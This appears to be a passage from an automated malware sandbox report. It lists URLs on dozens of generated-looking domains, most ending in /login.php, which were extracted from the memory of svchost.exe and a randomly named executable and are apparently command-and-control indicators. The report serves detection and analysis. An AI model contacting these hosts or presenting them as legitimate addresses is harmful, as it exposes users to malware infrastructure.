Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqil.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrel.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebysaq.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyteg.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyteg.com/P
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyteg.com/http://puvytag.com/H
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyvyl.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668590498.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyxog.com/login.php
Source: svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qedyfyq.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyhyl.com/ogin.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedykep.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618370430.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603383955.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603227948.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedykiv.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedylig.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566051870.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynul.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedysov.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedytoq.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyvap.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxip.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyxip.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyfyp.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhev.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1499147602.00000000008BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1499108924.000000000088C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.1661503631.000000000333D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665001861.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664095073.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegykeg.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818670457.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617440304.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818581824.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegylep.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegylul.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794566523.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyqaq.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633515874.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630932773.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1623381188.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1630421381.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632737159.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyqug.com/login.php
Source: svchost.exe, 00000002.00000003.1684842179.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684848884.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684994084.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684344887.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysiv.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysoq.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysoq.com/http://lysyxux.com/http://lysyxux.com/http://qekynuq.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysoq.com/login.php
